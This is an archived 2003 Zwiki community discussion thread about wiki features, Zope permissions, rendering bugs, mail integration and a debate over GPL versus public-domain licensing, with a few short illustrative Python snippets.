Auto-in-reply-to: this is the experimental feature activated on this site a few weeks ago, which tries to group posts into one thread per page per month. This is sort of nice when you come to read old mailman archives - you can see the effect in the september and late august mailman threaded archive. On the other hand it distorts posters' expressed threading intent slightly, and makes recent posts/threads a little harder to spot in mailman or newsreaders. I'll leave it on for the rest of september and compare october without it.
RemoteWikiLinks -- Thu, 11 Sep 2003 18:56:48 -0700 reply
we require the interwikilink regexp to end on an alphanumeric character (for some forgotten bug report):
Ahh, I see. I wish I could think of an example to override the general case of avoiding a space before punctuation, but I can't, so will keep the general consensus.
Strangely enough, I had noted that as a limitation on the RemoteWikiLinks page, and now have changed it to note that the target page (is that the correct term?) must be alphanumeric.
We may want to keep an eye out for cases where this should be expanded, such as Purple Number references: ZWiki:PurpleNumbers#nid1279 (<-- n/m!! It must end in an alphanumeric or /.) - DeanG
RemoteWikiLinks --Simon Michael, Thu, 11 Sep 2003 19:30:19 -0700 reply
Actually, it's only the last character of the url that has to be alphanumeric (or /). As you say, it was probably to allow a trailing period or colon after a url, without intervening space. Note that this is done only with remote wiki urls, where you don't need it. It's not done with bare urls (maybe it was once).
It's problematic anyhow, because urls ending in . are legal I believe and should be recognized. There's a consensus that urls in plain text should always have a trailing space to avoid this problem.
So I think I'll drop this url_endchar thing.
mail tip, threading --Simon Michael, Thu, 11 Sep 2003 19:33:13 -0700 reply
The gmane group is also great if you want to reply to an old message in your mail/news client, but have deleted the mail.
mail client change, mail list --Simon Michael, Thu, 11 Sep 2003 19:41:40 -0700 reply
it is a long URL, but it does ID the source of the message, which may justify including it in the mail-out.
Agreed, it is too useful to leave out.
How to display a link to log in --Kurt Yoder, Fri, 12 Sep 2003 06:17:35 -0700 reply
Simon Michael said:
OK, thanks for the information. I will look into this. Do you happen to know if it works with the Zope ldap authentication module also?
BTW, the mail-to-wiki code seems to have trouble with the email "quote" characters. It seems to want to wrap the line at strange places and/or not put the > at the beginning of the line. Just an observation.
-- Kurt Yoder Sport & Health network administrator
How to display a link to log in --Simon Michael, Fri, 12 Sep 2003 11:00:23 -0700 reply
OK, thanks for the information. I will look into this. Do you happen to know if it works with the Zope ldap authentication module also?
Yes, some solutions do.. check the products whose names end in UserFolder.
BTW, the mail-to-wiki code seems to have trouble with the email "quote" characters. It seems to want to wrap the line at strange places and/or not put the > at the beginning of the line. Just an observation.
Can you tell how to reproduce this ? Are you seeing the strangeness in email, on the page, or both ?
strange automatic renaming --FlorianKonnertz, Fri, 12 Sep 2003 11:18:04 -0700 reply
Really strange things happen in my wiki - when i edited a page the last character of the title was cut, and after saving and adding the title again the id was set to the same string. :-p Ever heard of that?? - I wonder if someone is hacking my site... - Florian
strange automatic renaming --Simon Michael, Fri, 12 Sep 2003 11:29:06 -0700 reply
What was the title (page name) ?
new setup methods for catalog, tracker, default pages --SimonMichael, Sat, 13 Sep 2003 00:47:03 -0700 reply
I've incorporated the SetupIssueTracker? script (who wrote that ?) as /setupCatalog and /setupTracker in cvs. They add catalog fields as described on ZwikiAndZCatalog, when needed; they are safe to run more than once. See Admin.py for more detail.
There's also a /setupPages (installs default pages) and /setupDtmlMethods
(installs index_html and standard_error_message, probably only for non-CMF sites).
All of these pass tests, but could use some real-world testing.
They require the Manage properties permission (on the page where you run them.. ie be a manager).
new setup methods for catalog, tracker, default pages --SimonMichael, Sat, 13 Sep 2003 00:50:09 -0700 reply
PS and I plan to remove the ZMI Add ZWiki Web option, for symmetry with CMF.
new setup methods for catalog, tracker, default pages --SimonMichael, Sat, 13 Sep 2003 01:03:42 -0700 reply
PS I could remove the ZMI Add ZWiki Web option now, for symmetry with CMF. But this requires that people run /setupPages before they see any getting started docs. Unless I add those to any page that they create, if it's the first one in the folder. Or we can keep Add ZWiki Web as a convenience. It could probably be changed to Add Wiki if we want. Also as a matter of interest, if I could change Add ZWiki Page to Add Wiki Page without causing upgrade hassles, would that be better ?
new setup methods for catalog, tracker, default pages --simon, Sat, 13 Sep 2003 01:48:31 -0700 reply
And in that case, the permissions would be renamed: to Add Wiki, Add Wiki Page (consistent with other zope objects); or Zwiki: Add wikis, Zwiki: Add wiki pages (consistent and grouped with other zwiki permissions). (Or some variant, eg: Zwiki: Create wikis, Zwiki: Create pages).
If these changes are worth the trouble, it looks as if they can be done while leaving the meta_type as before (ZWiki Page). Could it be confusing and un-zopish to have an object whose meta_type is spelled differently from its permissions and add menu item ? Any precedent for this ?
Finally (I promise) if that is considered a bit ugly, we could go all the way and change the meta_type to Wiki Page. At this point we run into upgrade hassles, as old wiki pages will stop working after an upgrade. Unless the product provides both classes, for backwards compatibility, which I suppose it would need to do forever. And is it desirable to remove the product name from all these places ? I leave you to ponder.. good night.
strange automatic renaming --FlorianKonnertz, Sat, 13 Sep 2003 01:52:17 -0700 reply
(groovesurfer) was renamed to groovesurfe - and NooWiki:WikiVerwendung was moved to NooWiki:WikiVerwendung|Moved -- what is that, that's new to me!??
diff note -- Sun, 14 Sep 2003 18:37:06 -0700 reply
The new text-wrap code in Python 2.3 may help reduce horizontal scrolling annoyances in page diff views.
Also noticed this time zone tool which might simplify some time zone handling. (??)
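For reference, the textwrap module (new in Python 2.3) is straightforward to apply; a diff view could pass each long unbroken line through it:

```python
# Sketch of using Python 2.3's textwrap module to wrap a long diff line
# (shown here with modern Python; the module survives unchanged).
import textwrap

long_line = ("this is a very long changed line from a page diff " * 4).strip()
wrapped = textwrap.fill(long_line, width=40)
print(wrapped)
```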
Default page type -- Mon, 15 Sep 2003 07:29:09 -0700 reply
I'm very confused. I'm running the 0.22 release, and the page type on newly created pages still seems to be set to default the same as the parent. But I have the source open in an editor right now and can see that it should default as follows:
p.page_type = type or self.defaultPageType()
and then:
    def defaultPageType(self):
        """This wiki's default page type."""
        allowedtypes = self.allowedPageTypes()
        if allowedtypes:
            return allowedtypes[0]
        else:
            return self.DEFAULT_PAGE_TYPE
Now type on a new page link should be None, and my allowed_page_types is set such that reST is the first one, and it does indeed show it as the first in the list; it just picks ST as the default if the parent is ST. It's almost like the older ZWiki code is still around. Anybody have a clue as to what is going on?
Colin
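For what it's worth, the fallback Colin quotes can be exercised standalone. A minimal sketch (hypothetical function, not the actual ZWiki classes) showing that any falsy type picks the wiki default:

```python
# Hypothetical standalone sketch of create()'s
# "type or self.defaultPageType()" fallback - not actual ZWiki code.
DEFAULT_PAGE_TYPE = 'structuredtext'

def choose_page_type(type=None, allowed_types=('reST', 'structuredtext')):
    # Any falsy type (None, '') falls through to the wiki default,
    # which is the first allowed type when allowed_page_types is set.
    if type:
        return type
    return allowed_types[0] if allowed_types else DEFAULT_PAGE_TYPE

print(choose_page_type())                  # the default: first allowed type
print(choose_page_type('structuredtext'))  # an explicit type wins
```

This is consistent with the symptom: if the editform passes the parent's type explicitly, create()'s default never gets a chance.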
RecentChanges? anomaly --DeanGoodmanson, Mon, 15 Sep 2003 11:44:23 -0700 reply
The dates on RecentChanges? are off. A search on "RecentChanges?" in the tracker returns everything.
note to self, cc: GeneralDiscussion --DeanGoodmanson, Mon, 15 Sep 2003 12:05:10 -0700 reply
- Remind the Zwiki community for feedback and collaboration on the [Simple Mailing List]? page.
- Analyze in light of Jon Udell's Email's Special Power
SisterSites, MetaWiki -- Mon, 15 Sep 2003 18:33:47 -0700 reply
Am I reading the pages correctly to understand that
- at one point SisterSites was implemented using a list of matching node-names from MeatBall:MetaWiki
- that list of matching nodes was 650kb back in 2000?
- querying that local list was against the text file, rather than against a Python dictionary or ZCatalog?
Should that approach be revisited? What is the right Zope way to handle a big chunk of structured data like that? Can you stuff a dictionary into a single ZODB entry? Is every thread caching a copy of it? If it's going to be read-only, does that help?
SisterSites, MetaWiki -- Tue, 16 Sep 2003 06:34:14 -0700 reply
One approach: the batch process that grabs the list from MetaWiki could step through every page in the local wiki and update a sisterSites property. (Yuck, have to beware deleted pages in sistersites.)
An issue: does one want to automatically include all those MetaWiki sites as SisterSites? Probably not, so you'd need a place (a SisterSitesList? page? or a folder property only the admin can get to? probably the former) to define the list to match against.
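One way to sketch the matching step (all names and data hypothetical): parse the fetched MetaWiki-style "PageName SiteUrl" list into a dictionary, keeping only explicitly declared sister sites:

```python
# Hypothetical sketch: match page names from a fetched MetaWiki-style
# list against an explicitly declared set of sister sites.
metawiki_data = """\
FrontPage http://www.usemod.com/cgi-bin/mb.pl?
FrontPage http://zwiki.org/
RecentChanges http://zwiki.org/
"""

declared_sisters = {'http://zwiki.org/'}

def sister_index(data, sisters):
    index = {}
    for line in data.splitlines():
        page, site = line.split(None, 1)
        if site in sisters:
            index.setdefault(page, []).append(site)
    return index

idx = sister_index(metawiki_data, declared_sisters)
print(idx['FrontPage'])
```

A nightly cron job could refresh the raw list and the wiki would only consult the filtered index.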
Another Acceptable URL character --DeanGoodmanson, Tue, 16 Sep 2003 11:05:56 -0700 reply
:-) Looks like curly braces need to be added also. My short search for a URL approving regex left me lost in a mess similar to looking up a javascript recipe.
(The following is a Jython database interaction article.) :{72F55276-094B-4F7E-A5B9-796A6C251F31}&element_id={770F9C3C-5472-4507-9779-51C2E84D8D38}&st={EA04B5C6-6D59-4670-AC88-4982C49B746D}&session_id={35CF3D7C-5845-4631-BE5F-A9B96EA0C071}
Brackets work for a short-term workaround
Sorry for replying to the wrong thread.
Another Acceptable URL character --DeanGoodmanson, Tue, 16 Sep 2003 11:09:59 -0700 reply
brackets worked in my 0.17 version. :-/
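The fix under discussion amounts to adding { and } to the URL character class; a hypothetical sketch (not Zwiki's actual pattern):

```python
import re

# Hypothetical sketch (not Zwiki's actual pattern): extend the URL
# character class with { and } so GUID-style query strings match whole.
URLCHARS = r"[A-Za-z0-9/:;@_%~#=&\.\-\?\+\$,\{\}]"
url_re = re.compile(r'http://%s+' % URLCHARS)

u = "http://example.com/x?id={72F55276-094B}"
print(url_re.search(u).group(0))  # matches braces and all
```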
Plone integration --Kurt Yoder, Tue, 16 Sep 2003 13:40:44 -0700 reply
Plone integration --Kurt Yoder, Tue, 16 Sep 2003 14:14:35 -0700 reply
Kurt Yoder said:
And after posting this I'm seeing info in the FAQ already...
-- Kurt Yoder Sport & Health network administrator
Plone integration --Simon Michael, Tue, 16 Sep 2003 15:15:25 -0700 reply
Woohoo! The docs are working! :)
Sorry I didn't understand the previous post at all. Hopefully it will become clear as you check out the examples.
Default page type --Simon Michael, Tue, 16 Sep 2003 15:31:15 -0700 reply
Hey Colin.. create() chooses the page_type when no type is passed in.. but in fact the default editform template has already told it what type to use, and it inherits the parent's type just as create() used to. I guess we should change it there too ? Instead of:
tal:attributes="value python:type; selected python:type==here.page_type;"
use:
tal:attributes="value python:type; selected python:type==here.defaultPageType();"
? I can't see the other ramifications if any.
RecentChanges? anomaly --Simon Michael, Tue, 16 Sep 2003 15:37:40 -0700 reply
The dates on RecentChanges? are off.
Someone else said this but I don't see it. Could it be the server timezone change I announced recently ? Do you have a timezone configured in UserOptions? ?
A search on "RecentChanges?" in the tracker returns everything.
Yup, got it in the tracker. Thanks.
note to self, cc: GeneralDiscussion --Simon Michael, Tue, 16 Sep 2003 15:47:06 -0700 reply
DeanGoodmanson wrote:
> a. Remind the Zwiki community for feedback and collaboration on the [Simple Mailing List]? page.
> b. Analyze in light of Jon Udell's "Email's Special Power"
It's on my mental todo list.. I liked the idea but didn't see what to do with it just yet. Where should we link it/merge it/whatever. Maybe some questions: What target audience does it address, how does it relate to WikiMail, where might they both belong on the refactored ZWiki page ? Nice link.
SisterSites, MetaWiki --Simon Michael, Tue, 16 Sep 2003 15:52:23 -0700 reply
Your reading is correct I think. I'd like to get this working again, but I don't necessarily want all MetaWiki sites. I'd like to make it easy to keep a zwiki synced with (usually a small number of) explicitly declared sister wikis. I was thinking in terms of a nightly cron script updating a local text file and reading that via LocalFS.. but any experiments on your part would be helpful.
permission, type renaming --Simon Michael, Tue, 16 Sep 2003 16:11:19 -0700 reply
More on this - good news! I found out the "Add..." permission names are not hardcoded. Bad news! I'm contemplating a permissions rename for 0.23. But I think it's worth it. Details:
- in the zmi add menu, change Add ZWiki Web and Add ZWiki Page to Add Wiki, Add Wiki Page
- in permissions, change Add ZWiki Web and Add ZWiki Page to Zwiki: Add wikis, Zwiki: Add pages. Also, while we're renaming, change Zwiki: Add comments to pages to Zwiki: Add comments.
- meta_type will remain ZWiki Page
Not consistent with everything but it looks to me like the least surprising arrangement. Here's some other options I thought about, and the other permissions for context:
    # before 0.23
    #AddWiki = 'Add ZWiki Webs'
    #Add = 'Add ZWiki Pages'
    #Comment = 'Zwiki: Add comments to pages'
    # from 0.23
    #AddWiki = 'Add Wikis'
    AddWiki = 'Zwiki: Add wikis'
    #AddWiki = 'Zwiki: Add wiki webs'
    #AddWiki = 'Zwiki: Create wikis'
    #AddWiki = 'Zwiki: Create wiki webs'
    #Add = 'Add Wiki Pages'
    Add = 'Zwiki: Add pages'
    #Add = 'Zwiki: Add wiki pages'
    #Add = 'Zwiki: Create pages'
    #Add = 'Zwiki: Create wiki pages'
    Comment = 'Zwiki: Add comments'
    ChangeType = 'Zwiki: Change page types'
    ChangeRegs = 'Zwiki: Change regulations'
    Delete = 'Zwiki: Delete pages'
    Edit = 'Zwiki: Edit pages'
    Rename = 'Zwiki: Rename pages'
    Reparent = 'Zwiki: Reparent pages'
permission, type renaming --Simon Michael, Tue, 16 Sep 2003 16:15:57 -0700 reply
PS in case it wasn't clear - I've already checked this in, but I'm looking for feedback on it, eg if you see any problems with this do speak up.
Power of email and wiki --DeanGoodmanson, Tue, 16 Sep 2003 16:56:55 -0700 reply
What target audience does it address?
I think the article covers the masses. I drew most of my criticism/tangents when considering it in a small community and/or intranet venue.
how does it relate to WikiMail?
The email cc: list seems to be forced membership nomination to a closed group, where wikimail is membership subscription in an open group. The cc: cost of entry is low, especially when compared to forums and mailing lists, but I don't consider it much heavier than zwiki's subscribe link. I wouldn't suggest adding "forced nomination" features to Zwiki (even in an intranet setting) as those are possible by forwarding the latest comment to those who might be interested. The cc: feature of immediate audience perspective is one which may work in an intranet, but in general pulls people back into the email grapevine.
where might they both belong on the refactored ZWiki page ?
I'm lost here.
Power of email and wiki --Simon Michael, Tue, 16 Sep 2003 19:05:50 -0700 reply
Oh, I meant how does it relate to the existing WikiMail page on this wiki, and what do we need to do to present this stuff more clearly to visitors. Sorry, I am burned out on docs right now.
Note we have an auto_subscribe feature that sounds like "forced nomination".
Zwiki and GPL vs ZPL vs BSD vs Public Domain -- Tue, 16 Sep 2003 21:09:07 -0700 reply
To continue the Zwiki License discussion:
I believe it is correct to say that each author of every single contribution to Zwiki is entitled to copyright law protection automatically on their piece of code. Especially considering that (I expect) all the authors were operating under the GPL system, meaning they each invoked a copy-left based on their individual right to ownership of their code. Unless every single author specifically assigned their copyright to Simon, then he would not have the legal authority to change the license for Zwiki as a whole, but rather only the parts he personally created. This is one example of how using these trick copyleft licenses only causes more problems down the road. You don't need any license or any ownership rights at all. In fact, the less restrictive the license is the better to help the adoption and spread of the software. Make a case for what negative things would happen if Zwiki was released into the public domain, and I would be happy to address it in detail.
Simon, are you saying that you would not be willing to code software (for hire) in the public domain? How much would you charge to rewrite/release Zwiki in the public domain? Once it is there, as you recognized, there is no going back. If not led by you, others will do it. It will be called Zwiki, or it will be by another name. You have the power to decide (and convince your contributors as well) if you want enable Zwiki to truly flourish or if you would rather open the door for another wiki product with a more liberal license to take its place over the long run. I know that this is the inevitable outcome. Really free, unrestricted, public domain software that encourages all types of use and sharing of code will win out over similar GPL-restricted code.
I won't be able to convince everyone, but I want to make a strong effort here to avoid duplicating your efforts. If you decide to go ZPL to get in line with FreeBSD?, Python and Zope, why stop there? Set the example by going public domain and watch Zwiki development take off.
If any of you find yourselves with strong opinions about this issue, please get in touch, I would really appreciate your feedback.
Nate n_johnson@yahoo.com
Rendering pages like IssueNoXXXX? --Hans Beck, Tue, 16 Sep 2003 22:48:16 -0700 reply
Hi,
I'm using Zwiki 0.22.0 with Zope 2.6, and my installation doesn't render pages like IssueNoXXXX?. But these pages can be created, and are visitable and changeable in the ZMI. Is this a known problem ? I've looked in the FAQ, docs and on zwiki.org and found nothing.
Thanks and greetings
Hans
Rendering pages like IssueNoXXXX? --Simon Michael, Wed, 17 Sep 2003 08:19:54 -0700 reply
What happens ?
What if you add some issue description after the XXXX ?
Mirroring a Zwiki
Is there a good way to mirror a zwiki?
thanks scott
FAQ --DeanGoodmanson, Wed, 17 Sep 2003 10:39:39 -0700 reply
The anchor references to questions ending in ? (eg. How ?) do not work on IE (5 and 6) for Windows. (Fine on Mozilla, Mac.)
granular page-trail-based permissions? -- Wed, 17 Sep 2003 11:28:16 -0700 reply
One thing I thought that was cool in the old zope.org wikis was the ability to set permissions for a single page and various pages related to it (child pages, or maybe anything following it, etc.). I think this could be handy for quickie creation of tiny short-lived private groups hidden away within more open spaces. Like embedding QuickTopic? into a Wiki. (I'm reminded/inspired by JonUdell?'s EmailsSpecialPowers? piece.)
granular page-trail-based permissions? --DeanGoodmanson, Wed, 17 Sep 2003 11:39:03 -0700 reply
Funny you should mention this... the RegulatingYourPages page and feature have recently been put into "is this feature worth the maintenance?" mode.
clear recycle_bin --DeanGoodmanson, Wed, 17 Sep 2003 15:52:41 -0700 reply
Saw the note on the FrontPage about catalog optimizations. I think the contents of recycle_bin are in your catalog (unless you've found a way to keep sub-folders from being indexed :-? ) and chucking them might eke out a tiny bit more resources.
... -- Wed, 17 Sep 2003 16:07:59 -0700 reply
SECURITY?
Someone please answer this!..
quick update --SimonMichael, Wed, 17 Sep 2003 16:26:57 -0700 reply
Delete is fixed and the catalog optimization for hierarchy generation is in effect again (it was looking for title_or_id which has been removed from the catalog). Sorry for the downtime this morning. Also I'm experimenting with an automatic discussion section separator, so you may see some double rules/"discussion" headings here and there.
clear recycle_bin --Simon Michael, Wed, 17 Sep 2003 16:37:42 -0700 reply
They should not be indexed.. ZwikiAndZCatalog has the trick.
AllPages -- Wed, 17 Sep 2003 19:58:06 -0700 reply
Had to get rid of CMFPlone AllPages temporarily because output is badly rendered as of my latest upgrade. I did Plone 1.0.5 along with 0.22, without looking things over in between, which is probably not the best idea. Prime suspect would probably be some CSS handling. Has anyone experienced this kind of problem lately?
Rendering pages like IssueNoXXXX? --Hans Beck, Wed, 17 Sep 2003 22:56:34 -0700 reply
Hi, these are the error messages:
--------------------------------------------------
Site Error
An error was encountered while publishing this resource.
Bad Request
Sorry, a site error occurred.
Traceback (innermost last):
  Module ZPublisher.Publish, line 150, in publish_module
  Module ZPublisher.Publish, line 114, in publish
  Module Zope.App.startup, line 199, in zpublisher_exception_hook
  Module ZPublisher.Publish, line 98, in publish
  Module ZPublisher.mapply, line 88, in mapply
  Module ZPublisher.Publish, line 39, in call_object
  Module Products.ZWiki.ZWikiPage, line 273, in __call__
  Module Products.ZWiki.ZWikiPage, line 2481, in upgrade
  Module Products.ZWiki, line 152, in manage_addProperty
  Module OFS.PropertyManager, line 248, in manage_addProperty
  Module OFS.PropertyManager, line 175, in _setProperty
Bad Request
-----------------------------------------------------
it doesn't matter if the name is "IssueNo0004? anything" or "IssueNo0004?"; it is the same whether creating the page in the ZMI or by using the zwiki mechanism
BTW, I'm using Win2k
- Hans
Subtopics --DeanGoodmanson, Thu, 18 Sep 2003 07:33:07 -0700 reply
Is this a magic property?
Subtopics --Simon Michael, Thu, 18 Sep 2003 09:55:18 -0700 reply
Not yet.. I hacked it into the render methods and let upgradeAll grind its way through all pages.
It's always on right now. Too obtrusive ? or maybe we will adjust. It makes the hierarchy more important and could make it easier to develop docs in the way of drupal books (cf ZWiki). Ideas welcome.
Re: IssueTracker page broken --Simon Michael, Thu, 18 Sep 2003 10:41:21 -0700 reply
Thank you, fixed.
Subtopics --Simon Michael, Thu, 18 Sep 2003 10:43:28 -0700 reply
I had to take it out.. it broke some dtml pages and was wrong - children need to be calculated dynamically at view time, not at edit time. This is not yet a totally cheap operation so disabled for the moment.
Rendering pages like IssueNoXXXX? --Simon Michael, Thu, 18 Sep 2003 12:06:39 -0700 reply
I thought this worked but apparently not. It's expecting the issue_categories/issue_severities/issue_statuses folder properties to be there. You can add these manually or try CVS where I've added a fix. Thanks.
FAQ --Simon Michael, Thu, 18 Sep 2003 12:09:46 -0700 reply
Dean - do the faq links not work at all in IE ? Or just the ones with space before the ? ?
Really those urls should be quoted but it's inconvenient.
FAQ -- Thu, 18 Sep 2003 12:14:49 -0700 reply
Just the ones with the space preceding the question mark. I didn't think about quoting. :-/
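A sketch of the quoting idea, using Python's standard URL quoting (modern urllib shown; the Zwiki-era equivalent was urllib.quote):

```python
# Sketch: percent-quoting heading anchors so fragments ending in " ?"
# survive stricter browsers like IE.
from urllib.parse import quote

heading = "How ?"
fragment = quote(heading)
print(fragment)  # -> How%20%3F
```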
Zwiki and GPL vs ZPL vs BSD vs Public Domain --Simon Michael, Thu, 18 Sep 2003 13:29:53 -0700 reply
Hi Nate - thanks for this and your letter. As is so often the case in these discussions we have similar goals and different ideas about the most effective strategies.
> Unless every single author specifically assigned their copyright to
> Simon, then he would not have the legal authority to change the
> license for Zwiki as a whole
That's why since very early on the copyright has read:
(c) 1999,2000,2001,2002,2003 Simon Michael <simon@joyful.com> for the zwiki community.
Not that I've asked anyone for papers.
Public domain has well-documented problems, though I can't put my finger on a doc right now. If I remember correctly one was that someone can take your PD code, copyright it and sue you for infringement. Something of that kind. A license (any license) gives the developer more protection against such things. GPL gives the developer most protection, at least in practice and to date, and so it is the conservative safe choice.
Whether I would offer parts of zwiki under an alternate PD license, or develop new code and release it as PD, for hire, is an interesting question. Like most GPL developers I'm open to providing GPL exceptions for commercial use for a fee. Releasing as PD is more than an exception though. It's "will you give up the GPL for this lesser non-license with its known problems ?" Well.. all I can say is that if the offer was high enough, I'd have to go and re-read those PD problem docs. :)
couple of ?s --dan mcmullen, Thu, 18 Sep 2003 14:35:41 -0700 reply
- i'm trying to enable the regulations logic. added a true use_regulations boolean to my top level ZWiki folder, but no effect seen in the edit page.
- also trying to get external editor running. seems to be working up to the point when the helper app opens the downloaded file. then get FATAL ERROR: unknown encoding: mbcs. same deal if i download the file & open it via cmd line.
running ZWiki 0.22/Zope 2.6.2/Mozilla/W2K
tia! dan
couple of ?s --SimonMichael, Thu, 18 Sep 2003 15:19:49 -0700 reply
The regulations form was removed from zwiki's plone edit form.. and what do you know, it's not in the default one either. So the bit-rot has already set in. I see back in march I wrote:
revision 1.1 date: 2003/03/29 04:45:19; author: simon; state: Exp; and lastly, a page template version of editform. I have not bothered with regulations until I hear from users.
And here you are (hi. :) You could get the old editform.dtml from the 0.18 release and drop it into an editform DTML Method in your wiki. It might work. If you go to that trouble, keep us posted.
No idea about the EE problem, sorry.
Daydreaming: "Find related pages/articles/comments" --PieterB, Fri, 19 Sep 2003 10:18:02 -0700 reply
Hi there... I've been thinking of a nice new feature: "find similar pages", which would work on more than one (z)wiki or blog. The plan is to index/spider several sites (such as zwiki.org), extract all the text on them (handling comments as separate texts), and feed the plain text to a Bayesian filter as a training document for the URL (and all the Zwiki page parents). This can be used to create a zwiki-classifier. The classifier can then be used to calculate the "distance" between any of the pages/articles/comments, and calculate the Top-N documents which are similar to the specific document.
I can even use the zwiki-mail, to minimize the load on zwiki.org.
I found the following classifiers (C++/C/Java/Python) which might be relevant:
Reverend: Reverend is a general purpose Bayesian classifier written in Python. It is designed to be easily extended to any application domain.
Divmod: Divmod Quotient is a personal conversation server. It is built on the Twisted framework, Lupy search engine and The Reverend bayesian classifier.
Bayesian Network Tools in Java (BNJ): Java/XML toolkit for research using Bayesian networks and other graphical models of probability (exact and approximate inference, structure learning, etc.)
Bayes++: Bayes++ is a library of C++ classes that implement numerical algorithms for Bayesian Filtering. They provide tested and consistent numerical methods and the class hierarchy represents the wide variety of Bayesian filtering algorithms and system models.
dbacl - digramic Bayesian classifier: dbacl is a general purpose digramic Bayesian text classifier. It can learn text documents you provide, and then compare new input with the learned categories. It can be used for spam filtering, or within your own shell scripts.
Bayesian Network Classifiers in Java: jBNC is a Java toolkit for training, testing, and applying Bayesian Network Classifiers. Implemented classifiers have been shown to perform well in a variety of artificial intelligence, machine learning, and data mining applications.
Pyndex: Pyndex is a simple and fast full-text indexer and Bayesian classifier implemented in Python. It uses Metakit as its storage back-end. It works well for quickly adding search to an application, and is also well suited to in-memory indexing and search.
Bayesian Filter Library: A general purpose C++ library. Essentially Bayesian Filtering is a way of having a program learn to categorize information from a specific user through pattern recognition. (C++)
libbayes: libbayes is a library for solving Bayesian decision theoretic problems in C.
Bichoco: Bichoco is a bayesian networks framework composed of a library written in Standard C++ and a GUI software. The library is ISO-C++ compliant. The GUI is ISO-C++ compliant and GNOME compliant (it is based on gnomemm library).
Anybody got some expertise with "automatic text classification" using open source tools? Anybody want to help thinking about this comment or want to contribute to it in some other form?
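As a starting point that needs none of the above libraries, here is a toy naive-Bayes scorer ranking trained pages by similarity to a new text. All helpers are hypothetical and purely illustrative, not part of any of the listed tools:

```python
import math
from collections import Counter

# Toy "find similar pages" scorer: naive-Bayes log-likelihood of a new
# text under each trained page's word distribution, with add-one
# smoothing. Hypothetical helpers, purely illustrative.
def train(docs):
    # docs: {page_name: plain_text}
    return {name: Counter(text.lower().split()) for name, text in docs.items()}

def rank(model, text):
    words = text.lower().split()
    scores = {}
    for name, counts in model.items():
        total = sum(counts.values())
        vocab = len(counts) + 1
        scores[name] = sum(
            math.log((counts[w] + 1) / (total + vocab)) for w in words)
    # least-negative log-likelihood first = most similar first
    return sorted(scores, key=scores.get, reverse=True)

model = train({
    'ZwikiAndZCatalog': 'catalog index zope search catalog',
    'WikiMail': 'mail subscription list mailout',
})
print(rank(model, 'searching the catalog index'))
```

A real version would want stemming, stop words and incremental training, which is where the listed libraries come in.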
Subtopics --SimonMichael, Fri, 19 Sep 2003 10:53:08 -0700 reply
Automatic subtopics have been re-enabled. They'll appear when you next edit or /clearCache a page. Sometimes these are useful, sometimes not; I'd like to avoid confusing options but I'm not sure it's possible to live with these always on. (See eg IssueTracker.)
Subtopics --DeanGoodmanson, Fri, 19 Sep 2003 13:22:18 -0700 reply
Thoughts on whether this would be kept outside the document? My surprise was that I couldn't find it in the edited text. (I think I communicated this similarly and poorly on BillSeitz page.)
I think I'd like it below the footer, but I can understand it between the doc and comment portion. There are also interesting implications for the /print method. One current bug in the print method is that you have to specify a value for the attributes for them to be not None. Do you know another way around this?
How can I mirror? -- Fri, 19 Sep 2003 13:26:23 -0700 reply
Can you explain what you want the mirror for? Reference or ... or backup?? (Print all w/ children.)
There's also the [curl]? or wget approach.
sorry --simon, Fri, 19 Sep 2003 13:29:32 -0700 reply
I just bounced someone's mailin by restarting the server.
I had a thought.... why does ZWiki not have a comment mode? I mean leading-line comments like:

# This is a comment

Is anybody opposed to such a thing? Mixing HTML and stx is somewhat distasteful; it would be nice if stx had its own comment mechanism.
Of course I should fix LatexWiki to respect HTML comments...
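The proposed comment mode could be as simple as a pre-render pass that drops leading-# lines; a hypothetical sketch, not existing Zwiki code:

```python
# Hypothetical pre-render pass for the proposed comment mode: drop any
# line whose first non-blank character is '#' before the page source
# is rendered.
def strip_comments(source):
    kept = [line for line in source.splitlines()
            if not line.lstrip().startswith('#')]
    return '\n'.join(kept)

src = "# editor note, not rendered\nVisible paragraph.\n# another note"
print(strip_comments(src))  # -> Visible paragraph.
```

A real version would need to spare '#' lines inside literal/code blocks, of course.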
Zwiki and GPL vs ZPL vs BSD vs Public Domain -- Fri, 19 Sep 2003 22:28:02 -0700 reply
Simon, I am searching for those Public-Domain-problem docs myself, and I keep turning up the same arguments:
- you lose control
- you can't prevent someone else from taking credit for your work
- you can't force someone to keep the source code open
- you can't force someone not to charge money or add restrictions to the derivative work
"someone can take your PD code, copyright it and sue you for infringement." One cannot choose to "copyright" something, which is why I still believe that you are legally incorrect to say that you have control over the copyright to contributed code without an overt act by each contributor (just like some projects assign their copyright to the FSF). Copyright protection happens automatically under the law for the author. Certainly there is plenty of evidence, forensic and by means of personal testimony, about who wrote the software and exactly when, not the least of which would be the cvs repository. No one can claim a copyright for the portions of their work that can easily be shown to have already been released into the public domain. "conservative safe choice." This doesn't seem the typical mantra of one so close to changing the world!
Not just with respect to software, but for everything, I am convinced that unrestricted (non-forced) sharing (no fear!) is the far superior means of making change.
FreeBSD? is attracting development BECAUSE of its liberal license. The more liberal, the more you will get! From Apple: "By pooling our expertise with the open source development community, we expect to improve the quality, performance, and feature set of our software. In addition, we realize that many developers enjoy working with open source software, and we want to give them the opportunity to use that kind of environment while they're creating solutions for Apple customers.
Although many people think that the rather simple BSD license does little to protect the openness of the code, it has contributed significantly to Apple's ability to adapt the code for the benefit of Mac users. Its emphasis on sharing code has also heightened our own commitment to the open development process. "
Please, let's keep this discussion going. Thanks!!!
Nate
ps now there is more about my general philosophy which tells me all this is true without a doubt on also see what would happen to computing if we redesigned everything to enable unrestricted sharing:
AttributeError? --gif, Sun, 21 Sep 2003 16:37:38 -0700 reply
Just upgraded to Zwiki 0.22.0 on Zope 2.6.2b5 and now I get this when accessing an old ZWiki: Traceback (innermost last):
-------------------------------
Module ZPublisher.Publish, line 150, in publish_module
Module Products.Localizer, line 58, in new_publish
Module ZPublisher.Publish, line 114, in publish
Module Zope.App.startup, line 199, in zpublisher_exception_hook
Module ZPublisher.Publish, line 89, in publish
Module ZPublisher.BaseRequest, line 418, in traverse
Module ZPublisher.BaseRequest, line 494, in old_validation
AttributeError
-------------------------
Newly added Wikis work fine. Any help appreciated!
Daydreaming: "Find related pages/articles/comments" --jos yule, Mon, 22 Sep 2003 06:38:47 -0700 reply
You might want to look at Zoe for some inspiration; i've been using it and it's pretty interesting/cool - it folds into the whole intertwingly thinking. See this article:
j
Subtopics --DeanGoodmanson, Mon, 22 Sep 2003 11:56:51 -0700 reply
